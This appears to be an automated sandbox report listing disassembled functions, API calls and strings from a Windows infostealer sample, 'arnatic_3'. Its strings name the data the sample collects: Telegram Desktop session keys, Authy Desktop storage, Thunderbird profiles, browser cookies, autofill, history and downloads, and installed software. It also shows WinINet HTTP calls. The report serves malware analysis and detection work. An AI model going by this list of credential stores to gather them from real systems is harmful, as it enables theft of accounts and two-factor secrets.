Part of subcall function 00413BD8: __EH_prolog3.LIBCMT ref: 00413BF7
Part of subcall function 00413BD8: _memset.LIBCMT ref: 00413C21
Part of subcall function 00413BD8: lstrcatA.KERNEL32(?,?,?,0000001A,?,?,00000014), ref: 00413C42
Part of subcall function 00413BD8: _memset.LIBCMT ref: 00413C4D
Part of subcall function 00413BD8: lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000014), ref: 00413C60
Part of subcall function 00413BD8: lstrcatA.KERNEL32(?,\Local State,?,?,?,?,?,00000014), ref: 00413C6E

Part of subcall function 00413A42: __EH_prolog3.LIBCMT ref: 00413A61
Part of subcall function 00413A42: _memset.LIBCMT ref: 00413A8B
Part of subcall function 00413A42: lstrcatA.KERNEL32(?,?,?,0000001C,?,?,00000014), ref: 00413AAC
Part of subcall function 00413A42: _memset.LIBCMT ref: 00413AB7
Part of subcall function 00413A42: lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000014), ref: 00413ACA
Part of subcall function 00413A42: lstrcatA.KERNEL32(?,004867F4,?,?,?,?,?,00000014), ref: 00413AD8
Part of subcall function 00413A42: lstrcatA.KERNEL32(?,?,?,?,?,?,00000014), ref: 00413AE7

CreateDirectoryA.KERNEL32(00000000), ref: 004152CE
_memset.LIBCMT ref: 004152E9
__wgetenv.LIBCMT ref: 004152F3
DeleteFileA.KERNEL32(00488C4C,?,004866C4), ref: 00415391
DeleteFileA.KERNEL32(00488C48,?,004866C4), ref: 00415398

Part of subcall function 00414422: __EH_prolog3.LIBCMT ref: 00414441
Part of subcall function 00414422: __wgetenv.LIBCMT ref: 0041444D
Part of subcall function 00414422: CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?), ref: 004144F9
Part of subcall function 00414422: CreateDirectoryA.KERNEL32(00000000,00000000,?,00000001,00000000,?,?,?), ref: 00414530

Part of subcall function 0040E95A: _memset.LIBCMT ref: 0040E97B
Part of subcall function 0040E95A: GetVersionExA.KERNEL32(?), ref: 0040E994

Part of subcall function 00412188: LoadLibraryA.KERNEL32 ref: 004121B9
Part of subcall function 00412188: GetProcAddress.KERNEL32(00000000), ref: 004121DA
Part of subcall function 00412188: GetProcAddress.KERNEL32(00000000), ref: 004121E8
Part of subcall function 00412188: GetProcAddress.KERNEL32(00000000), ref: 004121F6
Part of subcall function 00412188: GetProcAddress.KERNEL32(00000000), ref: 00412204
Part of subcall function 00412188: GetProcAddress.KERNEL32(00000000), ref: 00412212

Strings

Thunderbird, xrefs: 00415294
key_datas, xrefs: 0041533A
*.cookie, xrefs: 00414EBE
LOCALAPPDATA, xrefs: 00414E48, 00414EFC
\Thunderbird\Profiles\, xrefs: 00415299
map*, xrefs: 00415364
D877F783D5D3EF8C*, xrefs: 00415352
*.txt, xrefs: 00414E19, 00414F65
APPDATA, xrefs: 00414DA3, 004152EE
\Telegram Desktop\, xrefs: 0041532F

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _fprintf$lstrcat$_memset$AddressProc__wgetenv$H_prolog3$CreateDirectory$DeleteFileProcess_memmove$CloseH_prolog3_catch_HandleLibraryLoadOpenTerminateVersion__getenv_helper_nolock__lock_free_strnlen
String ID: *.cookie$*.txt$APPDATA$D877F783D5D3EF8C*$LOCALAPPDATA$Thunderbird$\Telegram Desktop\$\Thunderbird\Profiles\$key_datas$map*
API String ID: 2957431141-2658590742
Opcode ID: 0dff8d10a57e8509f21292307a97cb254f2a6b8693f8f725d1ff69b51ed3d6c2
Instruction ID: 598afa1ad68621eda2d8cbc84515abacd27efc3591280931473bb6bcd6e77fc4
Opcode Fuzzy Hash: 0dff8d10a57e8509f21292307a97cb254f2a6b8693f8f725d1ff69b51ed3d6c2
Instruction Fuzzy Hash: E1F17E70A04244AFCF06FF66DD169AD3F66AFA4308B44403FF801276B1DB7A4A54DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041473F, Relevance: 30.2, APIs: 16, Strings: 1, Instructions: 413COMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00414749

Part of subcall function 00404DBE: __EH_prolog3.LIBCMT ref: 00404DC5

Part of subcall function 004625DE: __EH_prolog3_GS.LIBCMT ref: 004625E8
Part of subcall function 004625DE: FindFirstFileW.KERNEL32(00000000,?,?,?,00000298,0040CF55,?), ref: 00462621
Part of subcall function 004625DE: FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 004626B2

Part of subcall function 0046222E: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000011,00000000,00000000,000003E8,?,00000000,?,?,?,0040DF3D,?,?,?), ref: 0046225D
Part of subcall function 0046222E: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,0040DF3D,?,?,?,?), ref: 0046228C

Part of subcall function 0040326C: std::_Xinvalid_argument.LIBCPMT ref: 00403286

_fprintf.LIBCMT ref: 00414A2A
_fprintf.LIBCMT ref: 00414A3A
_fprintf.LIBCMT ref: 00414A9D
_fprintf.LIBCMT ref: 00414AAD
_fprintf.LIBCMT ref: 00414AF0
_fprintf.LIBCMT ref: 00414B1F
_fprintf.LIBCMT ref: 00414B2F
_fprintf.LIBCMT ref: 00414B3F
_fprintf.LIBCMT ref: 00414B52
_fprintf.LIBCMT ref: 00414B75
_fprintf.LIBCMT ref: 00414B86
_fprintf.LIBCMT ref: 00414BAA
_fprintf.LIBCMT ref: 00414BB6
_fprintf.LIBCMT ref: 00414BDF
_fprintf.LIBCMT ref: 00414BEF

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Strings

FALSE, xrefs: 00414A2F, 00414AA2, 00414B24, 00414B47

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _fprintf$ByteCharFileFindMultiWide_memmove$FirstH_prolog3H_prolog3_H_prolog3_catch_NextXinvalid_argumentstd::_
String ID: FALSE
API String ID: 1663285408-4287395501
Opcode ID: 58d2380251b4e66978f4c4d623ee2dfddd15ed10545124ec25b184e6a560ee68
Instruction ID: e084d3c149f7167f452f52ffb4915083a5ac15d095060e832a518013ffd58dd7
Opcode Fuzzy Hash: 58d2380251b4e66978f4c4d623ee2dfddd15ed10545124ec25b184e6a560ee68
Instruction Fuzzy Hash: 90F16E71804218AADB25EB59DD81FEEB778AF51304F1041EFE40AB3181EB745E88DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00420E9A, Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 185COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00420EF5
__fprintf_l.LIBCMT ref: 00420F63
__fprintf_l.LIBCMT ref: 00420F94
_memmove.LIBCMT ref: 0042103A
__fprintf_l.LIBCMT ref: 004210C1

Strings

program, xrefs: 00420F02
%.16g, xrefs: 00420F13
BINARY, xrefs: 00420FEE
%s(%d), xrefs: 00420F7A
nil, xrefs: 00420FD1
%lld, xrefs: 00420EDA
(%.20s), xrefs: 00420F5C
intarray, xrefs: 00420EEE
vtab:%p:%p, xrefs: 004210BA
(blob), xrefs: 004210A8
NULL, xrefs: 0042109E
k(%d, xrefs: 00420F8D

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: __fprintf_l$_memmove
String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$BINARY$NULL$intarray$k(%d$nil$program$vtab:%p:%p
API String ID: 3461008893-3240840594
Opcode ID: beee8903974abbd7f53f4641ab56536f5bb7104809fdd7854970c65b6a70510c
Instruction ID: d9a6c231e1116d8786163eaf7492febeb477964463f0310a5ebf693e5c2f9f1c
Opcode Fuzzy Hash: beee8903974abbd7f53f4641ab56536f5bb7104809fdd7854970c65b6a70510c
Instruction Fuzzy Hash: 4861E270E002649FCB249F58D880A7EB7B0EF15314F65458BF9119B2E2D3B89981CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004440B8, Relevance: 28.5, APIs: 2, Strings: 14, Instructions: 473COMMON

Download Yara Rule

Strings

Fragmentation of %d bytes reported as %d on page %d, xrefs: 004445D5
Rowid %lld out of order (min less than parent min of %lld), xrefs: 004443C5
Rowid %lld out of order (max larger than parent min of %lld), xrefs: 004443A2
On tree page %d cell %d: , xrefs: 00444190
unable to get the page. error code=%d, xrefs: 00444126
btreeInitPage() returns error code %d, xrefs: 0044414F
Page %d: , xrefs: 00444110, 00444351
Multiple uses for byte %d of page %d, xrefs: 004445B6
Rowid %lld out of order (previous was %lld), xrefs: 004441F6
Rowid %lld out of order (min less than parent max of %lld), xrefs: 00444430
Child page depth differs, xrefs: 004442D3
On page %d at right child: , xrefs: 00444317
Rowid %lld out of order (max larger than parent max of %lld), xrefs: 004443F3
Corruption detected in cell %d on page %d, xrefs: 0044451C

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID:
String ID: Child page depth differs$Corruption detected in cell %d on page %d$Fragmentation of %d bytes reported as %d on page %d$Multiple uses for byte %d of page %d$On page %d at right child: $On tree page %d cell %d: $Page %d: $Rowid %lld out of order (max larger than parent max of %lld)$Rowid %lld out of order (max larger than parent min of %lld)$Rowid %lld out of order (min less than parent max of %lld)$Rowid %lld out of order (min less than parent min of %lld)$Rowid %lld out of order (previous was %lld)$btreeInitPage() returns error code %d$unable to get the page. error code=%d
API String ID: 0-2326541033
Opcode ID: 15a41a650d41fdfb61c1de7836bddbe519c1c6cca8f1d609c6041f2628e3cfcd
Instruction ID: ac2b6020ad10fb08cd0198fd00f7490fc361000c60547be1bcca488f8b70d24d
Opcode Fuzzy Hash: 15a41a650d41fdfb61c1de7836bddbe519c1c6cca8f1d609c6041f2628e3cfcd
Instruction Fuzzy Hash: 40127B71D00219AFEF15DFA9C881BAEBBB0FF44314F14816AF855A7241D778AE50CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0045EFD3, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 185registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0045EFF5

Part of subcall function 00411D07: __EH_prolog3.LIBCMT ref: 00411D0E

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

RegEnumKeyExA.ADVAPI32(?,?,?,0000000F,00000000,00000000,00000000,00000000), ref: 0045F0C0
wsprintfA.USER32 ref: 0045F0E7
RegCloseKey.ADVAPI32(?), ref: 0045F108
RegCloseKey.ADVAPI32(?), ref: 0045F111

Part of subcall function 00411D71: __EH_prolog3.LIBCMT ref: 00411D78

Strings

DisplayName, xrefs: 0045F12C
DisplayVersion, xrefs: 0045F16A
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0045F050, 0045F055, 0045F0D8, 0045F0DD
%s\%s, xrefs: 0045F0E1

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: CloseH_prolog3$EnumH_prolog3_catch_memmovewsprintf
String ID: %s\%s$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 303669999-3586320934
Opcode ID: 1cfb0530f78204776b03f41966d9d8f9a03362c8631c2fbd6eeb82200d847f7c
Instruction ID: 6e5abbfe7d4467fc1ba9f73f392e17bdd44654d848fe4b91ed7a628773165d7a
Opcode Fuzzy Hash: 1cfb0530f78204776b03f41966d9d8f9a03362c8631c2fbd6eeb82200d847f7c
Instruction Fuzzy Hash: D2610BB280021DAFDB10EFD1DD85EEEBBBCEB18304F50447BF605A6151DB385A498B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040E07B, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 143networkCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040E082
__cftof.LIBCMT ref: 0040E10B
InternetOpenA.WININET(?,00000000,?,00000000,00000000), ref: 0040E126
InternetSetOptionA.WININET(00000000,00000041,00000004), ref: 0040E149
InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 0040E16A
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00400000,00000001), ref: 0040E194
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E1AD
InternetCloseHandle.WININET(00000000), ref: 0040E1C3

Part of subcall function 00402EA9: std::_Xinvalid_argument.LIBCPMT ref: 00402EBC
Part of subcall function 00402EA9: _memmove.LIBCMT ref: 00402EF7

InternetCloseHandle.WININET(?), ref: 0040E1CC
InternetCloseHandle.WININET(?), ref: 0040E1D5

Strings

/, xrefs: 0040E0CF
GET, xrefs: 0040E18E
http://, xrefs: 0040E0A5

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSendXinvalid_argument__cftof_memmovestd::_
String ID: /$GET$http://
API String ID: 2363951992-2325301807
Opcode ID: 5ef13418cd202b5c760c466fcfffcc8725a78c25ad29f0011d68531e8ec971ae
Instruction ID: baa47893f5e2f63132686ac2b6e9658a39ae2208ff4d8ac47f04266efd301875
Opcode Fuzzy Hash: 5ef13418cd202b5c760c466fcfffcc8725a78c25ad29f0011d68531e8ec971ae
Instruction Fuzzy Hash: 954139B1900208AFEB11EBE6CC85EEEBB7CEB14704F10443EF512B61D1DBB959458B69

Uniqueness

Uniqueness Score: -1.00%

Function 004042FC, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 277COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040434D
_memmove.LIBCMT ref: 0040439B
_memmove.LIBCMT ref: 004043C5
_memmove.LIBCMT ref: 004043FB
_memmove.LIBCMT ref: 00404457
_memmove.LIBCMT ref: 004044B1
_memmove.LIBCMT ref: 004044FE
_memmove.LIBCMT ref: 0040452C
_memmove.LIBCMT ref: 0040455F
std::_Xinvalid_argument.LIBCPMT ref: 0040458B

Strings

invalid string position, xrefs: 00404586
string too long, xrefs: 00404348

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: 155f691a7b067bb1c1decc598775855b2cbb5ea657a943606f6345f547b4eea3
Instruction ID: 899bd5057f4b245a7073f35a2b8aa300cf13f198bc9f97cdc78f723007b74924
Opcode Fuzzy Hash: 155f691a7b067bb1c1decc598775855b2cbb5ea657a943606f6345f547b4eea3
Instruction Fuzzy Hash: 42913DB03001059BCF24DF08DD91A6E77A6EFC1708724493EFA42AB681D778E895CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0042E9C3, Relevance: 21.3, APIs: 3, Strings: 9, Instructions: 269COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0042EAAB
__fprintf_l.LIBCMT ref: 0042EBDC
_memmove.LIBCMT ref: 0042EC86

Strings

_init, xrefs: 0042EB92
error during initialization: %s, xrefs: 0042EC2F
sqlite3_extension_init, xrefs: 0042EA22
%s.%s, xrefs: 0042EA4C
no entry point [%s] in shared library [%s], xrefs: 0042EBD5
unable to open shared library [%s], xrefs: 0042EAA4
sqlite3_, xrefs: 0042EB1A
lib, xrefs: 0042EB3F
not authorized, xrefs: 0042EA00

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: __fprintf_l$_memmove
String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%s]
API String ID: 3461008893-4148685299
Opcode ID: 728c9c1ffb4322d2fcecd9739a34b3b1f3d638984c12f5ab917d1c05a7a8e87b
Instruction ID: a3d6fd5ca3ef3c855322f82496a563b8a8e4167d5c54f5a4dfe8a97be8d47bff
Opcode Fuzzy Hash: 728c9c1ffb4322d2fcecd9739a34b3b1f3d638984c12f5ab917d1c05a7a8e87b
Instruction Fuzzy Hash: 8F91C271A00315EFDF20DFA6E841AAF7BB8EF44304F54446AF845AB241E7399A50CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042A9E0, Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 0041E17B: _memset.LIBCMT ref: 0041E198

__fprintf_l.LIBCMT ref: 0042AA77
__fprintf_l.LIBCMT ref: 0042AAF3
__fprintf_l.LIBCMT ref: 0042AB6C
__fprintf_l.LIBCMT ref: 0042ABFC

Strings

etilqs_, xrefs: 0042A9E9, 0042ABED
cF, xrefs: 0042AB1B
winGetTempname3, xrefs: 0042AAD4
winGetTempname1, xrefs: 0042AA58
winGetTempname5, xrefs: 0042ABCC
winGetTempname4, xrefs: 0042ABE3
winGetTempname2, xrefs: 0042AB40
cF, xrefs: 0042AAB7

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: __fprintf_l$_memset
String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname3$winGetTempname4$winGetTempname5$cF$cF
API String ID: 639243752-2005322851
Opcode ID: 07d78963b6e6606111ff7859c32d138ab3fc276d38c31e60f89e29fa35e7f40d
Instruction ID: 2ee2853e1f6dd5ec6d808ab433e8efd95ab197805f5e0638baf64196842c1032
Opcode Fuzzy Hash: 07d78963b6e6606111ff7859c32d138ab3fc276d38c31e60f89e29fa35e7f40d
Instruction Fuzzy Hash: E9611930704615EFDB14BF2AA9419FE3BA69F41344B94442FF90186282EF3DD992C69F

Uniqueness

Uniqueness Score: -1.00%

Function 004406E4, Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 360COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00440A75

Strings

access, xrefs: 004409BE
cache, xrefs: 00440971
invalid uri authority: %.*s, xrefs: 004407B6
no such %s mode: %s, xrefs: 004409FD
mode, xrefs: 0044099E
localhost, xrefs: 004407A3
vfs, xrefs: 0044094B
no such vfs: %s, xrefs: 00440A9E
file:, xrefs: 00440725
%s mode not allowed: %s, xrefs: 00440A43

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: %s mode not allowed: %s$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
API String ID: 4104443479-2023962546
Opcode ID: bf0abdb90610a9b29a3ce2ebd699c54d1eb584ce410c4d9e429e0be68d82cc6a
Instruction ID: 1595dc19c9025fa1a63917c4d6a83d7d1d2fc7a057c0d675beac33ccc0dd06a3
Opcode Fuzzy Hash: bf0abdb90610a9b29a3ce2ebd699c54d1eb584ce410c4d9e429e0be68d82cc6a
Instruction Fuzzy Hash: 84C10971D043159BFF24DF68C5802EEBBB1AF55314F24406BEA44AB342D33C9DA28B99

Uniqueness

Uniqueness Score: -1.00%

Function 00414422, Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 240fileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00414441
__wgetenv.LIBCMT ref: 0041444D

Part of subcall function 00404C99: __EH_prolog3.LIBCMT ref: 00404CA0

Part of subcall function 004625DE: __EH_prolog3_GS.LIBCMT ref: 004625E8
Part of subcall function 004625DE: FindFirstFileW.KERNEL32(00000000,?,?,?,00000298,0040CF55,?), ref: 00462621
Part of subcall function 004625DE: FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 004626B2

CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?), ref: 004144F9
CreateDirectoryA.KERNEL32(00000000,00000000,?,00000001,00000000,?,?,?), ref: 00414530

Part of subcall function 0046222E: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000011,00000000,00000000,000003E8,?,00000000,?,?,?,0040DF3D,?,?,?), ref: 0046225D
Part of subcall function 0046222E: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,0040DF3D,?,?,?,?), ref: 0046228C

CopyFileW.KERNEL32(00000000,?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041465F

Strings

\files\Soft\Authy, xrefs: 0041450F
\Authy Desktop\Local Storage\, xrefs: 00414605
files\Soft\Authy, xrefs: 00414545
APPDATA, xrefs: 00414446
\Authy Desktop\Local Storage\*.localstorage, xrefs: 0041447F
\files\Soft, xrefs: 004144D4

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: File$ByteCharCreateDirectoryFindH_prolog3MultiWide$CopyFirstH_prolog3_Next__wgetenv
String ID: APPDATA$\Authy Desktop\Local Storage\$\Authy Desktop\Local Storage\*.localstorage$\files\Soft$\files\Soft\Authy$files\Soft\Authy
API String ID: 2019322786-2614104896
Opcode ID: 022521362ce29794e926f6391db9f7533bc0661d0d41b6f8264857d3c3402a5e
Instruction ID: ef8d5050d3c2600a77f25921873ec0ef8ba6c812aaf675df922d19410b1008d5
Opcode Fuzzy Hash: 022521362ce29794e926f6391db9f7533bc0661d0d41b6f8264857d3c3402a5e
Instruction Fuzzy Hash: 8E916FB1801149EFDB25EFA4CD85FEE77BCAF55308F00016EB809A7181EA785B08DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00404027, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00404069
_memmove.LIBCMT ref: 004040B4
_memmove.LIBCMT ref: 004040EE
_memmove.LIBCMT ref: 00404111
std::_Xinvalid_argument.LIBCPMT ref: 0040413D
std::_Xinvalid_argument.LIBCPMT ref: 00404188
std::_Xinvalid_argument.LIBCPMT ref: 0040419E
_memmove.LIBCMT ref: 004041E1
_memmove.LIBCMT ref: 004041FE

Strings

invalid string position, xrefs: 00404138, 00404183
string too long, xrefs: 00404064, 00404199

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: 8062c476601233449f07772e9756d621446ff947a098dcfd59e743115f3ce4e4
Instruction ID: 6e07bc3476025e6ae2cf0eec7c27ad8c8e16084bcb52b38c04ef326ebdbc7726
Opcode Fuzzy Hash: 8062c476601233449f07772e9756d621446ff947a098dcfd59e743115f3ce4e4
Instruction Fuzzy Hash: AF51E1B03002449BDB249E5DCD8492BB7A6EBD1704B14092EF652AB7C1CB79EC8187AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED43, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 112filestringCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040ED83
lstrcatA.KERNEL32(?,\temp), ref: 0040ED95
CopyFileA.KERNEL32(?,?,00000001), ref: 0040EDA5
_memset.LIBCMT ref: 0040EDB3
_sprintf.LIBCMT ref: 0040EDC5
DeleteFileA.KERNEL32(?), ref: 0040EE80

Part of subcall function 004695DE: __fsopen.LIBCMT ref: 004695EB

_fprintf.LIBCMT ref: 0040EE40
_fprintf.LIBCMT ref: 0040EE4B

Strings

%s%s, xrefs: 0040EE3A
\temp, xrefs: 0040ED89
Autofill\%s_%s.txt, xrefs: 0040EDBF

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: File_fprintf$CopyCurrentDeleteDirectory__fsopen_memset_sprintflstrcat
String ID: %s%s$Autofill\%s_%s.txt$\temp
API String ID: 2288810340-2986410175
Opcode ID: 8c8908e08c693812764d30768f8f9a757476530765f746be616997ca318633b4
Instruction ID: 15b5d1eed0785f7a2bd7c910da51c69491893222a81c627b6edb2c1af7c65665
Opcode Fuzzy Hash: 8c8908e08c693812764d30768f8f9a757476530765f746be616997ca318633b4
Instruction Fuzzy Hash: 78319172904108AEEF30AFB2DC45EDF776CAF05718F20052FF505B3142EA395A558B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040EE9E, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 106filestringCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040EEDE
lstrcatA.KERNEL32(?,\temp), ref: 0040EEF0
CopyFileA.KERNEL32(?,?,00000001), ref: 0040EF00
_memset.LIBCMT ref: 0040EF0E
_sprintf.LIBCMT ref: 0040EF20
DeleteFileA.KERNEL32(?), ref: 0040EFCA

Part of subcall function 004695DE: __fsopen.LIBCMT ref: 004695EB

_fprintf.LIBCMT ref: 0040EF95

Strings

History\%s_%s.txt, xrefs: 0040EF1A
%s, xrefs: 0040EF8F
\temp, xrefs: 0040EEE4
SELECT url FROM urls, xrefs: 0040EF47

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: File$CopyCurrentDeleteDirectory__fsopen_fprintf_memset_sprintflstrcat
String ID: %s$History\%s_%s.txt$SELECT url FROM urls$\temp
API String ID: 440339207-2199967400
Opcode ID: 99b7033c14837d539e8787a5de2a49fdfd99e7301ab771a09f12dc5375d212e7
Instruction ID: fe3d55c5869541b102e53fd83cb304de1128b9952fc40e9f00ba7b3acc091f5f
Opcode Fuzzy Hash: 99b7033c14837d539e8787a5de2a49fdfd99e7301ab771a09f12dc5375d212e7
Instruction Fuzzy Hash: 8B318172904108AEEB30AFB2DC45EEE7B6CEF05714F20042FF509B3152EE399A558B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040EFE8, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 109filestringCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F028
lstrcatA.KERNEL32(?,\temp), ref: 0040F03A
CopyFileA.KERNEL32(?,?,00000001), ref: 0040F04A
_memset.LIBCMT ref: 0040F058
_sprintf.LIBCMT ref: 0040F06A
DeleteFileA.KERNEL32(?), ref: 0040F11A

Part of subcall function 004695DE: __fsopen.LIBCMT ref: 004695EB

_fprintf.LIBCMT ref: 0040F0E5

Strings

%s%s, xrefs: 0040F0DF
Downloads\%s_%s.txt, xrefs: 0040F064
\temp, xrefs: 0040F02E

Memory Dump Source

Source File: 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_arnatic_3.jbxd

Yara matches

Similarity

API ID: File$CopyCurrentDeleteDirectory__fsopen_fprintf_memset_sprintflstrcat
String ID: %s%s$Downloads\%s_%s.txt$\temp
API String ID: 440339207-2902098628
Opcode ID: 05df2ff7ff432aec7313f20ad5d06162a5b2feac7ddcabd376da4e16e32dc0c4
Instruction ID: e3ff1ce4060aa0b7d909d3b56d83d0e47b00f7fcd0ae2039c5a928d7cb5ad1d6
Opcode Fuzzy Hash: 05df2ff7ff432aec7313f20ad5d06162a5b2feac7ddcabd376da4e16e32dc0c4
Instruction Fuzzy Hash: F5318172904108AEEF30AFB1DC45EDE7BACAB05714F20053FF505B7152EA399A488B59

Uniqueness

Uniqueness Score: -1.00%

Function 00460915, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0046091C
std::_Lockit::_Lockit.LIBCPMT ref: 00460926
int.LIBCPMT ref: 0046093D

Part of subcall function 0040E7B8: std::_Lockit::_Lockit.LIBCPMT ref: 0040E7C9

std::locale::_Getfacet.LIBCPMT ref: 00460946
codecvt.LIBCPMT ref: 00460960
